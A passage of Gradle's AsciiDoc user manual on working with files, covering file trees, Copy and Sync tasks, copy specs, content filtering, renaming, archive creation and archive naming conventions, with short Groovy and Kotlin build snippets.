tree\n====\ninclude::sample[dir=\"snippets\/files\/fileTrees\/groovy\",files=\"build.gradle[tags=define]\"]\ninclude::sample[dir=\"snippets\/files\/fileTrees\/kotlin\",files=\"build.gradle.kts[tags=define]\"]\n====\n\nYou can see more examples of supported patterns in the API docs for link:{javadocPath}\/org\/gradle\/api\/tasks\/util\/PatternFilterable.html[PatternFilterable]. Also, see the API documentation for `fileTree()` to see what types you can pass as the base directory.\n\nBy default, `fileTree()` returns a `FileTree` instance that applies some default exclude patterns for convenience \u2014 the same defaults as Ant in fact. 
For the complete default exclude list, see http:\/\/ant.apache.org\/manual\/dirtasks.html#defaultexcludes[the Ant manual].\n\n[[sec:change_default_excludes]]\nIf those default excludes prove problematic, you can work around the issue by changing the default excludes in the settings script:\n\n.Changing default excludes in the settings script\n====\ninclude::sample[dir=\"snippets\/files\/copy\/groovy\",files=\"settings.gradle[tags=change-default-exclusions]\"]\ninclude::sample[dir=\"snippets\/files\/copy\/kotlin\",files=\"settings.gradle.kts[tags=change-default-exclusions]\"]\n====\n\n[NOTE]\n====\nCurrently, Gradle's default excludes are configured via Ant's `DirectoryScanner` class.\n====\n\n[NOTE]\n====\nGradle does not support changing default excludes during the execution phase.\n====\n\nYou can do many of the same things with file trees that you can with file collections:\n\n * iterate over them (depth first)\n * filter them (using link:{javadocPath}\/org\/gradle\/api\/file\/FileTree.html#matching-org.gradle.api.Action-[FileTree.matching(org.gradle.api.Action)] and Ant-style patterns)\n * merge them\n\nYou can also traverse file trees using the link:{javadocPath}\/org\/gradle\/api\/file\/FileTree.html#visit-org.gradle.api.Action-[FileTree.visit(org.gradle.api.Action)] method. All of these techniques are demonstrated in the following example:\n\n.Using a file tree\n====\ninclude::sample[dir=\"snippets\/files\/fileTrees\/groovy\",files=\"build.gradle[tags=use]\"]\ninclude::sample[dir=\"snippets\/files\/fileTrees\/kotlin\",files=\"build.gradle.kts[tags=use]\"]\n====\n\nWe've discussed how to create your own file trees and file collections, but it's also worth bearing in mind that many Gradle plugins provide their own instances of file trees, such as <<building_java_projects.adoc#sec:java_source_sets,Java's source sets>>. These can be used and manipulated in exactly the same way as the file trees you create yourself.\n\nAnother specific type of file tree that users commonly need is the archive, i.e. ZIP files, TAR files, etc. We look at those next.\n\n[[sec:archive_contents]]\n=== Using archives as file trees\n\nAn archive is a directory and file hierarchy packed into a single file. In other words, it's a special case of a file tree, and that's exactly how Gradle treats archives. Instead of using the `fileTree()` method, which only works on normal file systems, you use the link:{groovyDslPath}\/org.gradle.api.Project.html#org.gradle.api.Project:zipTree(java.lang.Object)[Project.zipTree(java.lang.Object)] and link:{groovyDslPath}\/org.gradle.api.Project.html#org.gradle.api.Project:tarTree(java.lang.Object)[Project.tarTree(java.lang.Object)] methods to wrap archive files of the corresponding type (note that JAR, WAR and EAR files are ZIPs). Both methods return `FileTree` instances that you can then use in the same way as normal file trees. For example, you can extract some or all of the files of an archive by copying its contents to some directory on the file system. 
Or you can merge one archive into another.\n\nHere are some simple examples of creating archive-based file trees:\n\n.Using an archive as a file tree\n====\ninclude::sample[dir=\"snippets\/files\/fileTrees\/groovy\",files=\"build.gradle[tags=archive-trees]\"]\ninclude::sample[dir=\"snippets\/files\/fileTrees\/kotlin\",files=\"build.gradle.kts[tags=archive-trees]\"]\n====\n\nYou can see a practical example of extracting an archive file <<#sec:unpacking_archives_example,in among the common scenarios>> we cover.\n\n[[sec:specifying_multiple_files]]\n=== Understanding implicit conversion to file collections\n\nMany objects in Gradle have properties which accept a set of input files.\nFor example, the link:{groovyDslPath}\/org.gradle.api.tasks.compile.JavaCompile.html[JavaCompile] task has a `source` property that defines the source files to compile.\nYou can set the value of this property using any of the types supported by the <<#sec:file_collections,files()>> method, as mentioned in the API docs.\nThis means you can, for example, set the property to a `File`, `String`, collection, `FileCollection` or even a closure or `Provider`.\n\n*This is a feature of specific tasks*!\nThat means implicit conversion will not happen for just any task that has a `FileCollection` or `FileTree` property.\nIf you want to know whether implicit conversion happens in a particular situation, you will need to read the relevant documentation, such as the corresponding task's API docs.\nAlternatively, you can remove all doubt by explicitly using link:{javadocPath}\/org\/gradle\/api\/file\/ProjectLayout.html#files-java.lang.Object++...++-[ProjectLayout.files(java.lang.Object++...++)] in your build.\n\nHere are some examples of the different types of arguments that the `source` property can take:\n\n.Specifying a set of files\n====\ninclude::sample[dir=\"snippets\/files\/inputFiles\/groovy\",files=\"build.gradle[tags=set-input-files]\"]\ninclude::sample[dir=\"snippets\/files\/inputFiles\/kotlin\",files=\"build.gradle.kts[tags=set-input-files]\"]\n====\n\nOne other thing to note is that properties like `source` have corresponding methods in core Gradle tasks. Those methods follow the convention of _appending_ to collections of values rather than replacing them. Again, these methods accept any of the types supported by the <<#sec:file_collections,files()>> method, as shown here:\n\n.Appending a set of files\n====\ninclude::sample[dir=\"snippets\/files\/inputFiles\/groovy\",files=\"build.gradle[tags=add-input-files]\"]\ninclude::sample[dir=\"snippets\/files\/inputFiles\/kotlin\",files=\"build.gradle.kts[tags=add-input-files]\"]\n====\n\nAs this is a common convention, we recommend that you follow it in your own custom tasks. 
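\n\nFor instance, a custom task class might expose such an appending method along these lines (the `ProcessDocs` class and its property are hypothetical):\n\n[source,groovy]\n----\nabstract class ProcessDocs extends DefaultTask {\n    @InputFiles\n    abstract ConfigurableFileCollection getDocs()\n\n    \/\/ follows the core-task convention: append rather than replace\n    void docs(Object... paths) {\n        getDocs().from(paths)\n    }\n}\n----\n\n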
Specifically, if you plan to add a method to configure a collection-based property, make sure the method appends rather than replaces values.\n\n[[sec:copying_files]]\n== File copying in depth\n\nThe basic process of copying files in Gradle is a simple one:\n\n * Define a task of type link:{groovyDslPath}\/org.gradle.api.tasks.Copy.html[Copy]\n * Specify which files (and potentially directories) to copy\n * Specify a destination for the copied files\n\nBut this apparent simplicity hides a rich API that allows fine-grained control of which files are copied, where they go, and what happens to them as they are copied \u2014 renaming of the files and token substitution of file content are both possibilities, for example.\n\nLet's start with the last two items on the list, which form what is known as a _copy specification_. This is formally based on the link:{javadocPath}\/org\/gradle\/api\/file\/CopySpec.html[CopySpec] interface, which the `Copy` task implements, and offers:\n\n * A link:{javadocPath}\/org\/gradle\/api\/file\/CopySpec.html#from-java.lang.Object++...++-[CopySpec.from(java.lang.Object...)] method to define what to copy\n * An link:{javadocPath}\/org\/gradle\/api\/file\/CopySpec.html#into-java.lang.Object-[CopySpec.into(java.lang.Object)] method to define the destination\n\n`CopySpec` has several additional methods that allow you to control the copying process, but these two are the only required ones. `into()` is straightforward, requiring a directory path as its argument in any form supported by the link:{groovyDslPath}\/org.gradle.api.Project.html#org.gradle.api.Project:file(java.lang.Object)[Project.file(java.lang.Object)] method. The `from()` configuration is far more flexible.\n\nNot only does `from()` accept multiple arguments, it also allows several different types of argument. For example, some of the most common types are:\n\n * A `String` \u2014 treated as a file path or, if it starts with \"file:\/\/\", a file URI\n * A `File` \u2014 used as a file path\n * A `FileCollection` or `FileTree` \u2014 all files in the collection are included in the copy\n * A task \u2014\u00a0the files or directories that form a task's <<more_about_tasks.adoc#sec:task_inputs_outputs,defined outputs>> are included\n\nIn fact, `from()` accepts all the same arguments as link:{groovyDslPath}\/org.gradle.api.Project.html#org.gradle.api.Project:files(java.lang.Object++[]++)[Project.files(java.lang.Object...)] so see that method for a more detailed list of acceptable types.\n\nSomething else to consider is what type of thing a file path refers to:\n\n * A file \u2014 the file is copied as is\n * A directory \u2014 this is effectively treated as a file tree: everything in it, including subdirectories, is copied. However, the directory itself is not included in the copy.\n * A non-existent file \u2014 the path is ignored\n\nHere is an example that uses multiple `from()` specifications, each with a different argument type. 
You will probably also notice that `into()` is configured lazily using a closure (in Groovy) or a Provider (in Kotlin) \u2014 a technique that also works with `from()`:\n\n.Specifying copy task source files and destination directory\n====\ninclude::sample[dir=\"snippets\/files\/copy\/groovy\",files=\"build.gradle[tags=copy-task-2]\"]\ninclude::sample[dir=\"snippets\/files\/copy\/kotlin\",files=\"build.gradle.kts[tags=copy-task-2]\"]\n====\n\nNote that the lazy configuration of `into()` is different from a <<#sub:using_child_copy_specifications,child specification>>, even though the syntax is similar. Keep an eye on the number of arguments to distinguish between them.\n\n[[filtering_files]]\n=== Filtering files\n\nYou've already seen that you can filter file collections and file trees directly in a `Copy` task, but you can also apply filtering in any copy specification through the link:{javadocPath}\/org\/gradle\/api\/file\/CopySpec.html#include-java.lang.String++...++-[CopySpec.include(java.lang.String...)] and link:{javadocPath}\/org\/gradle\/api\/file\/CopySpec.html#exclude-java.lang.String++...++-[CopySpec.exclude(java.lang.String...)] methods.\n\nBoth of these methods are normally used with Ant-style include or exclude patterns, as described in link:{javadocPath}\/org\/gradle\/api\/tasks\/util\/PatternFilterable.html[PatternFilterable]. You can also perform more complex logic by using a closure that takes a link:{javadocPath}\/org\/gradle\/api\/file\/FileTreeElement.html[FileTreeElement] and returns `true` if the file should be included or `false` otherwise. The following example demonstrates both forms, ensuring that only .html and .jsp files are copied, except for those .html files with the word \"DRAFT\" in their content:\n\n.Selecting the files to copy\n====\ninclude::sample[dir=\"snippets\/files\/copy\/groovy\",files=\"build.gradle[tags=copy-task-with-patterns]\"]\ninclude::sample[dir=\"snippets\/files\/copy\/kotlin\",files=\"build.gradle.kts[tags=copy-task-with-patterns]\"]\n====\n\nA question you may ask yourself at this point is: what happens when inclusion and exclusion patterns overlap? Which pattern wins? Here are the basic rules:\n\n * If there are no explicit inclusions or exclusions, everything is included\n * If at least one inclusion is specified, only files and directories matching the patterns are included\n * Any exclusion pattern overrides any inclusions, so if a file or directory matches at least one exclusion pattern, it won't be included, regardless of the inclusion patterns\n\nBear these rules in mind when creating combined inclusion and exclusion specifications so that you end up with the exact behavior you want.\n\nNote that the inclusions and exclusions in the above example will apply to _all_ `from()` configurations. If you want to apply filtering to a subset of the copied files, you'll need to use <<sub:using_child_copy_specifications,child specifications>>.\n\n[[sec:renaming_files]]\n=== Renaming files\n\nThe <<#sec:renaming_files_example,example of how to rename files on copy>> gives you most of the information you need to perform this operation. It demonstrates the two options for renaming:\n\n * Using a regular expression\n * Using a closure\n\nRegular expressions are a flexible approach to renaming, particularly as Gradle supports regex groups that allow you to remove and replace parts of the source filename. 
The following example shows how you can remove the string \"-staging-\" from any filename that contains it using a simple regular expression:\n\n.Renaming files as they are copied\n====\ninclude::sample[dir=\"snippets\/files\/copy\/groovy\",files=\"build.gradle[tags=rename-files]\"]\ninclude::sample[dir=\"snippets\/files\/copy\/kotlin\",files=\"build.gradle.kts[tags=rename-files]\"]\n====\n\nYou can use any regular expression supported by the Java `{javaApi}\/java\/util\/regex\/Pattern.html[Pattern]` class and the substitution string (the second argument of `rename()`) works on the same principles as the `{javaApi}\/java\/util\/regex\/Matcher.html#appendReplacement(java.lang.StringBuffer,%20java.lang.String)[Matcher.appendReplacement()]` method.\n\n.Regular expressions in Groovy build scripts\n[NOTE]\n====\nThere are two common issues people come across when using regular expressions in this context:\n\n 1. If you use a slashy string (those delimited by '\/') for the first argument, you _must_ include the parentheses for `rename()` as shown in the above example.\n 2. It's safest to use single quotes for the second argument, otherwise you need to escape the '$' in group substitutions, i.e. `\"\\$1\\$2\"`\n\nThe first is a minor inconvenience, but slashy strings have the advantage that you don't have to escape backslash ('\\') characters in the regular expression. The second issue stems from Groovy's support for embedded expressions using `${ }` syntax in double-quoted and slashy strings.\n====\n\nThe closure syntax for `rename()` is straightforward and can be used for any requirements that simple regular expressions can't handle. You're given the name of a file and you return a new name for that file, or `null` if you don't want to change the name. Do be aware that the closure will be executed for every file that's copied, so try to avoid expensive operations where possible.\n\n[[sec:filtering_files]]\n=== Filtering file content (token substitution, templating, etc.)\n\nNot to be confused with filtering which files are copied, _file content filtering_ allows you to transform the content of files while they are being copied. This can involve basic templating that uses token substitution, removal of lines of text, or even more complex filtering using a full-blown template engine.\n\nThe following example demonstrates several forms of filtering, including token substitution using the link:{javadocPath}\/org\/gradle\/api\/file\/CopySpec.html#expand-java.util.Map-[CopySpec.expand(java.util.Map)] method and another using link:{javadocPath}\/org\/gradle\/api\/file\/CopySpec.html#filter-java.lang.Class-[CopySpec.filter(java.lang.Class)] with an https:\/\/ant.apache.org\/manual\/Types\/filterchain.html[Ant filter]:\n\n.Filtering files as they are copied\n====\ninclude::sample[dir=\"snippets\/files\/copy\/groovy\",files=\"build.gradle[tags=filter-files]\"]\ninclude::sample[dir=\"snippets\/files\/copy\/kotlin\",files=\"build.gradle.kts[tags=filter-files]\"]\n====\n\nThe `filter()` method has two variants, which behave differently:\n\n * one takes a `{javaApi}\/java\/io\/FilterReader.html[FilterReader]` and is designed to work with Ant filters, such as `ReplaceTokens`\n * one takes a closure or link:{javadocPath}\/org\/gradle\/api\/Transformer.html[Transformer] that defines the transformation for each line of the source file\n\nNote that both variants assume the source files are text based. 
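\n\nAs an illustration of the second variant, a line-by-line transformation might look like this sketch (paths and the marker word are illustrative):\n\n[source,groovy]\n----\ntasks.register('copyNotes', Copy) {\n    from 'src\/notes'\n    into layout.buildDirectory.dir('notes')\n    \/\/ Called once per line, without the line separator;\n    \/\/ returning null drops the line from the copied file\n    filter { String line ->\n        line.contains('INTERNAL') ? null : line\n    }\n}\n----\n\n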
When you use the `ReplaceTokens` class with `filter()`, the result is a template engine that replaces tokens of the form `@tokenName@` (the Ant-style token) with values that you define.\n\nThe `expand()` method treats the source files as https:\/\/docs.groovy-lang.org\/latest\/html\/api\/groovy\/text\/SimpleTemplateEngine.html[Groovy templates], which evaluate and expand expressions of the form `${expression}`. You can pass in property names and values that are then expanded in the source files. `expand()` allows for more than basic token substitution as the embedded expressions are full-blown Groovy expressions.\n\nNOTE: It's good practice to specify the character set when reading and writing the file, otherwise the transformations won't work properly for non-ASCII text. You configure the character set with the link:{javadocPath}\/org\/gradle\/api\/file\/CopySpec.html#getFilteringCharset--[CopySpec.getFilteringCharset()] property. If it's not specified, the JVM default character set is used, which is likely to be different from the one you want.\n\n[[sec:using_the_copyspec_class]]\n=== Using the `CopySpec` class\n\nA copy specification (or copy spec for short) determines what gets copied to where, and what happens to files during the copy. You've already seen many examples in the form of configuration for `Copy` and archiving tasks. But copy specs have two attributes that are worth covering in more detail:\n\n 1. They can be independent of tasks\n 2. They are hierarchical\n\nThe first of these attributes allows you to _share copy specs within a build_. The second provides fine-grained control within the overall copy specification.\n\n[[sub:sharing_copy_specs]]\n==== Sharing copy specs\n\nConsider a build that has several tasks that copy a project's static website resources or add them to an archive. One task might copy the resources to a folder for a local HTTP server and another might package them into a distribution. You could manually specify the file locations and appropriate inclusions each time they are needed, but human error is more likely to creep in, resulting in inconsistencies between tasks.\n\nOne solution Gradle provides is the link:{groovyDslPath}\/org.gradle.api.Project.html#org.gradle.api.Project:copySpec(org.gradle.api.Action)[Project.copySpec(org.gradle.api.Action)] method. This allows you to create a copy spec outside of a task, which can then be attached to an appropriate task using the link:{javadocPath}\/org\/gradle\/api\/file\/CopySpec.html#with-org.gradle.api.file.CopySpec++...++-[CopySpec.with(org.gradle.api.file.CopySpec...)] method. The following example demonstrates how this is done:\n\n.Sharing copy specifications\n====\ninclude::sample[dir=\"snippets\/files\/copy\/groovy\",files=\"build.gradle[tags=standalone-copyspec]\"]\ninclude::sample[dir=\"snippets\/files\/copy\/kotlin\",files=\"build.gradle.kts[tags=standalone-copyspec]\"]\n====\n\nBoth the `copyAssets` and `distApp` tasks will process the static resources under `src\/main\/webapp`, as specified by `webAssetsSpec`.\n\n[NOTE]\n====\nThe configuration defined by `webAssetsSpec` will _not_ apply to the app classes included by the `distApp` task. That's because `from appClasses` is its own child specification independent of `with webAssetsSpec`.\n\nThis can be confusing to understand, so it's probably best to treat `with()` as an extra `from()` specification in the task. 
Hence it doesn't make sense to define a standalone copy spec without at least one `from()` defined.\n====\n\nIf you encounter a scenario in which you want to apply the same copy configuration to _different_ sets of files, then you can share the configuration block directly without using `copySpec()`. Here's an example that has two independent tasks that happen to want to process image files only:\n\n.Sharing copy patterns only\n====\ninclude::sample[dir=\"snippets\/files\/copy\/groovy\",files=\"build.gradle[tags=shared-copy-patterns]\"]\ninclude::sample[dir=\"snippets\/files\/copy\/kotlin\",files=\"build.gradle.kts[tags=shared-copy-patterns]\"]\n====\n\nIn this case, we assign the copy configuration to its own variable and apply it to whatever `from()` specification we want. This doesn't just work for inclusions, but also exclusions, file renaming, and file content filtering.\n\n[[sub:using_child_copy_specifications]]\n==== Using child specifications\n\nIf you only use a single copy spec, the file filtering and renaming will apply to _all_ the files that are copied. Sometimes this is what you want, but not always. Consider the following example that copies files into a directory structure that can be used by a Java Servlet container to deliver a website:\n\n.Creating an exploded WAR for a Servlet container\nimage::exploded-war-child-copy-spec-example.png[]\n\nThis is not a straightforward copy as the `WEB-INF` directory and its subdirectories don't exist within the project, so they must be created during the copy. In addition, we only want HTML and image files going directly into the root folder \u2014 `build\/explodedWar` \u2014 and only JavaScript files going into the `js` directory. So we need separate filter patterns for those two sets of files.\n\nThe solution is to use _child specifications_, which can be applied to both `from()` and `into()` declarations. The following task definition does the necessary work:\n\n.Nested copy specs\n====\ninclude::sample[dir=\"snippets\/files\/sampleJavaProject\/groovy\",files=\"build.gradle[tags=nested-specs]\"]\ninclude::sample[dir=\"snippets\/files\/sampleJavaProject\/kotlin\",files=\"build.gradle.kts[tags=nested-specs]\"]\n====\n\nNotice how the `src\/dist` configuration has a nested inclusion specification: that's the child copy spec. You can of course add content filtering and renaming here as required. A child copy spec is still a copy spec.\n\nThe above example also demonstrates how you can copy files into a subdirectory of the destination either by using a child `into()` on a `from()` or a child `from()` on an `into()`. Both approaches are acceptable, but you may want to create and follow a convention to ensure consistency across your build files.\n\n[NOTE]\nDon't get your `into()` specifications mixed up! For a normal copy \u2014\u00a0one to the filesystem rather than an archive \u2014 there should always be _one_ \"root\" `into()` that simply specifies the overall destination directory of the copy. Any other `into()` should have a child spec attached and its path will be relative to the root `into()`.\n\nOne final thing to be aware of is that a child copy spec inherits its destination path, include patterns, exclude patterns, copy actions, name mappings and filters from its parent. So be careful where you place your configuration.\n\n[[sec:project_copy_method]]\n=== Copying files in your own tasks\n\nThere might be occasions when you want to copy files or directories as _part_ of a task. 
For example, a custom archiving task based on an unsupported archive format might want to copy files to a temporary directory before they are then archived. You still want to take advantage of Gradle's copy API, but without introducing an extra `Copy` task.\n\nThe solution is to use the link:{groovyDslPath}\/org.gradle.api.Project.html#org.gradle.api.Project:copy(org.gradle.api.Action)[Project.copy(org.gradle.api.Action)] method. It works the same way as the `Copy` task by configuring it with a copy spec. Here's a trivial example:\n\n.Copying files using the copy() method without up-to-date check\n====\ninclude::sample[dir=\"snippets\/files\/copy\/groovy\",files=\"build.gradle[tags=copy-method]\"]\ninclude::sample[dir=\"snippets\/files\/copy\/kotlin\",files=\"build.gradle.kts[tags=copy-method]\"]\n====\n\nThe above example demonstrates the basic syntax and also highlights two major limitations of using the `copy()` method:\n\n 1. The `copy()` method is not <<more_about_tasks.adoc#sec:up_to_date_checks,incremental>>. The example's `copyMethod` task will _always_ execute because it has no information about what files make up the task's inputs. You have to manually define the task inputs and outputs.\n\n 2. Using a task as a copy source, i.e. as an argument to `from()`, won't set up an automatic task dependency between your task and that copy source. As such, if you are using the `copy()` method as part of a task action, you must explicitly declare all inputs and outputs in order to get the correct behavior.\n\nThe following example shows you how to work around these limitations by using the <<more_about_tasks.adoc#sec:task_input_output_runtime_api,dynamic API for task inputs and outputs>>:\n\n.Copying files using the copy() method with up-to-date check\n====\ninclude::sample[dir=\"snippets\/files\/copy\/groovy\",files=\"build.gradle[tags=copy-method-with-dependency]\"]\ninclude::sample[dir=\"snippets\/files\/copy\/kotlin\",files=\"build.gradle.kts[tags=copy-method-with-dependency]\"]\n====\n\nThese limitations make it preferable to use the `Copy` task wherever possible, because of its built-in support for incremental building and task dependency inference. That is why the `copy()` method is intended for use by <<custom_tasks.adoc#custom_tasks,custom tasks>> that need to copy files as part of their function. Custom tasks that use the `copy()` method should declare the necessary inputs and outputs relevant to the copy action.\n\n[[sec:sync_task]]\n=== Mirroring directories and file collections with the `Sync` task\n\nThe link:{groovyDslPath}\/org.gradle.api.tasks.Sync.html[Sync] task, which extends the `Copy` task, copies the source files into the destination directory and then removes any files from the destination directory which it did not copy. In other words, it synchronizes the contents of a directory with its source. 
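A minimal sketch of the idea in the Kotlin DSL (the task name and paths here are illustrative):\n\n[source,kotlin]\n----\ntasks.register<Sync>(\"syncDocs\") {\n    from(\"src\/docs\")\n    \/\/ anything in the destination that was not copied gets deleted\n    into(layout.buildDirectory.dir(\"docs\"))\n}\n----\n\n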
This can be useful for doing things such as installing your application, creating an exploded copy of your archives, or maintaining a copy of the project's dependencies.\n\nHere is an example which maintains a copy of the project's runtime dependencies in the `build\/libs` directory.\n\n.Using the Sync task to copy dependencies\n====\ninclude::sample[dir=\"snippets\/files\/sync\/groovy\",files=\"build.gradle[tags=copy-dependencies]\"]\ninclude::sample[dir=\"snippets\/files\/sync\/kotlin\",files=\"build.gradle.kts[tags=copy-dependencies]\"]\n====\n\nYou can also perform the same function in your own tasks with the link:{groovyDslPath}\/org.gradle.api.Project.html#org.gradle.api.Project:sync(org.gradle.api.Action)[Project.sync(org.gradle.api.Action)] method.\n\n[[sec:copy_deploy]]\n=== Deploying single files into application servers\n\nWhen working with application servers, you can use a `Copy` task to deploy the application archive (e.g. a WAR file).\nSince you are deploying a single file, the destination directory of the `Copy` is the whole deployment directory.\nThe deployment directory sometimes contains unreadable files like named pipes, so Gradle may have problems doing up-to-date checks.\nIn order to support this use case, you can use link:{groovyDslPath}\/org.gradle.api.tasks.Copy.html#org.gradle.api.tasks.Copy:ignoreExistingContentInDestinationDir()[Copy.ignoreExistingContentInDestinationDir()].\n\n.Using Copy to deploy a WAR file\n====\ninclude::sample[dir=\"snippets\/files\/deployWarWithCopy\/groovy\",files=\"build.gradle\"]\ninclude::sample[dir=\"snippets\/files\/deployWarWithCopy\/kotlin\",files=\"build.gradle.kts\"]\n====\n\n[[sec:install_executable]]\n=== Installing executables\n\nWhen you are building a standalone executable, you may want to install this file on your system, so it ends up in your path.\nYou can use a `Copy` task to install the executable into shared directories like `\/usr\/local\/bin`.\nThe installation directory probably contains many other executables, some of which may even be unreadable by Gradle.\nTo support the unreadable files in `Copy`'s destination directory and to avoid possibly expensive up-to-date checks, you should use link:{groovyDslPath}\/org.gradle.api.tasks.Copy.html#org.gradle.api.tasks.Copy:ignoreExistingContentInDestinationDir()[Copy.ignoreExistingContentInDestinationDir()].\n\n.Using Copy to install an executable\n====\ninclude::sample[dir=\"snippets\/files\/installExecutable\/groovy\",files=\"build.gradle\"]\ninclude::sample[dir=\"snippets\/files\/installExecutable\/kotlin\",files=\"build.gradle.kts\"]\n====\n\n[[sec:archives]]\n== Archive creation in depth\n\nArchives are essentially self-contained file systems and Gradle treats them as such. This is why working with archives is very similar to working with files and directories, including such things as file permissions.\n\nOut of the box, Gradle supports creation of both ZIP and TAR archives, and by extension Java's JAR, WAR and EAR formats \u2014\u00a0Java's archive formats are all ZIPs. Each of these formats has a corresponding task type to create them: link:{groovyDslPath}\/org.gradle.api.tasks.bundling.Zip.html[Zip], link:{groovyDslPath}\/org.gradle.api.tasks.bundling.Tar.html[Tar], link:{groovyDslPath}\/org.gradle.api.tasks.bundling.Jar.html[Jar], link:{groovyDslPath}\/org.gradle.api.tasks.bundling.War.html[War], and link:{groovyDslPath}\/org.gradle.plugins.ear.Ear.html[Ear]. 
These all work the same way and are based on copy specifications, just like the `Copy` task.\n\nCreating an archive file is essentially a file copy in which the destination is implicit, i.e. the archive file itself. Here's a basic example that specifies the path and name of the target archive file:\n\n.Archiving a directory as a ZIP\n====\ninclude::sample[dir=\"snippets\/files\/copy\/groovy\",files=\"build.gradle[tags=create-archive-example]\"]\ninclude::sample[dir=\"snippets\/files\/copy\/kotlin\",files=\"build.gradle.kts[tags=create-archive-example]\"]\n====\n\nIn the next section you'll learn about convention-based archive names, which can save you from always configuring the destination directory and archive name.\n\nThe full power of copy specifications is available to you when creating archives, which means you can do content filtering, file renaming or anything else that is covered in the previous section. A particularly common requirement is copying files into subdirectories of the archive that don't exist in the source folders, something that can be achieved with `into()` <<#sub:using_child_copy_specifications,child specifications>>.\n\nGradle does of course allow you to create as many archive tasks as you want, but it's worth bearing in mind that many convention-based plugins provide their own. For example, the Java plugin adds a `jar` task for packaging a project's compiled classes and resources in a JAR. Many of these plugins provide sensible conventions for the names of archives as well as the copy specifications used. We recommend you use these tasks wherever you can, rather than overriding them with your own.\n\n[[sec:archive_naming]]\n=== Archive naming\n\nGradle has several conventions around the naming of archives and where they are created based on the plugins your project uses. 
The main convention is provided by the <<base_plugin.adoc#base_plugin,Base Plugin>>, which defaults to creating archives in the `$buildDir\/distributions` directory and typically uses archive names of the form _[projectName]-[version].[type]_.\n\nThe following example comes from a project named `archive-naming`, hence the `myZip` task creates an archive named `archive-naming-1.0.zip`:\n\n.Creation of ZIP archive\n====\ninclude::sample[dir=\"snippets\/files\/archiveNaming\/groovy\",files=\"build.gradle[tags=zip-task]\"]\ninclude::sample[dir=\"snippets\/files\/archiveNaming\/kotlin\",files=\"build.gradle.kts[tags=zip-task]\"]\n====\n\n.Output of **`gradle -q myZip`**\n----\n> gradle -q myZip\ninclude::{snippetsPath}\/files\/archiveNaming\/tests\/archiveNaming.out[]\n----\n\nNote that the name of the archive does _not_ derive from the name of the task that creates it.\n\nIf you want to change the name and location of a generated archive file, you can provide values for the `archiveFileName` and `destinationDirectory` properties of the corresponding task.\nThese override any conventions that would otherwise apply.\n\nAlternatively, you can make use of the default archive name pattern provided by link:{groovyDslPath}\/org.gradle.api.tasks.bundling.AbstractArchiveTask.html#org.gradle.api.tasks.bundling.AbstractArchiveTask:archiveFileName[AbstractArchiveTask.getArchiveFileName()]: _[archiveBaseName]-[archiveAppendix]-[archiveVersion]-[archiveClassifier].[archiveExtension]_.\nYou can set each of these properties on the task separately if you wish.\nNote that the Base Plugin uses the convention of project name for _archiveBaseName_, project version for _archiveVersion_ and the archive type for _archiveExtension_.\nIt does not provide values for the other properties.\n\nThis example \u2014 from the same project as the one above \u2014 configures just the `archiveBaseName` property, overriding the default value of the project name:\n\n.Configuration of archive task - custom archive name\n====\ninclude::sample[dir=\"snippets\/files\/archiveNaming\/groovy\",files=\"build.gradle[tags=zip-task-with-custom-base-name]\"]\ninclude::sample[dir=\"snippets\/files\/archiveNaming\/kotlin\",files=\"build.gradle.kts[tags=zip-task-with-custom-base-name]\"]\n====\n\n.Output of **`gradle -q myCustomZip`**\n----\n> gradle -q myCustomZip\ninclude::{snippetsPath}\/files\/archiveNaming\/tests\/zipWithCustomName.out[]\n----\n\nYou can also override the default `archiveBaseName` value for _all_ the archive tasks in your build by using the _project_ property `archivesBaseName`, as demonstrated by the following example:\n\n.Configuration of archive task - appendix & classifier\n====\ninclude::sample[dir=\"snippets\/files\/archivesChangedBaseName\/groovy\",files=\"build.gradle[]\"]\ninclude::sample[dir=\"snippets\/files\/archivesChangedBaseName\/kotlin\",files=\"build.gradle.kts[]\"]\n====\n\n.Output of **`gradle -q echoNames`**\n----\n> gradle -q echoNames\ninclude::{snippetsPath}\/files\/archivesChangedBaseName\/tests\/zipWithArchivesBaseName.out[]\n----\n\nYou can find all the possible archive task properties in the API documentation for link:{groovyDslPath}\/org.gradle.api.tasks.bundling.AbstractArchiveTask.html[AbstractArchiveTask], but we have also summarized the main ones here:\n\n`archiveFileName` \u2014 `Property<String>`, default: `__archiveBaseName__-__archiveAppendix__-__archiveVersion__-__archiveClassifier__.__archiveExtension__`::\nThe complete file name of the generated archive. 
If any of the properties in the default value are empty, their '-' separator is dropped.\n\n`archiveFile` \u2014 `Provider<RegularFile>`, _read-only_, default: `__destinationDirectory__\/__archiveFileName__`::\nThe absolute file path of the generated archive.\n\n`destinationDirectory` \u2014 `DirectoryProperty`, default: depends on archive type::\nThe target directory in which to put the generated archive. By default, JARs and WARs go into `$buildDir\/libs`. ZIPs and TARs go into `$buildDir\/distributions`.\n\n`archiveBaseName` \u2014 `Property<String>`, default: `__project.name__`::\nThe base name portion of the archive file name, typically a project name or some other descriptive name for what it contains.\n\n`archiveAppendix` \u2014 `Property<String>`, default: `null`::\nThe appendix portion of the archive file name that comes immediately after the base name. It is typically used to distinguish between different forms of content, such as code and docs, or a minimal distribution versus a full or complete one.\n\n`archiveVersion` \u2014 `Property<String>`, default: `__project.version__`::\nThe version portion of the archive file name, typically in the form of a normal project or product version.\n\n`archiveClassifier` \u2014 `Property<String>`, default: `null`::\nThe classifier portion of the archive file name. Often used to distinguish between archives that target different platforms.\n\n`archiveExtension` \u2014 `Property<String>`, default: depends on archive type and compression type::\nThe filename extension for the archive. By default, this is set based on the archive task type and the compression type (if you're creating a TAR). Will be one of: `zip`, `jar`, `war`, `tar`, `tgz` or `tbz2`. You can of course set this to a custom extension if you wish.\n\n[[sec:sharing_content_between_multiple_archives]]\n=== Sharing content between multiple archives\n\n<<#sub:sharing_copy_specs,As described earlier>>, you can use the link:{groovyDslPath}\/org.gradle.api.Project.html#org.gradle.api.Project:copySpec(org.gradle.api.Action)[Project.copySpec(org.gradle.api.Action)] method to share content between archives.\n\n[[sec:reproducible_archives]]\n=== Reproducible builds\n\nSometimes it's desirable to recreate archives exactly the same, byte for byte, on different machines. You want to be sure that building an artifact from source code produces the same result no matter when and where it is built. This is necessary for projects like https:\/\/reproducible-builds.org\/[reproducible-builds.org].\n\nReproducing the same byte-for-byte archive poses some challenges since the order of the files in an archive is influenced by the underlying file system. Each time a ZIP, TAR, JAR, WAR or EAR is built from source, the order of the files inside the archive may change. Files that only have a different timestamp also cause differences in archives from build to build. All link:{groovyDslPath}\/org.gradle.api.tasks.bundling.AbstractArchiveTask.html[AbstractArchiveTask] (e.g. 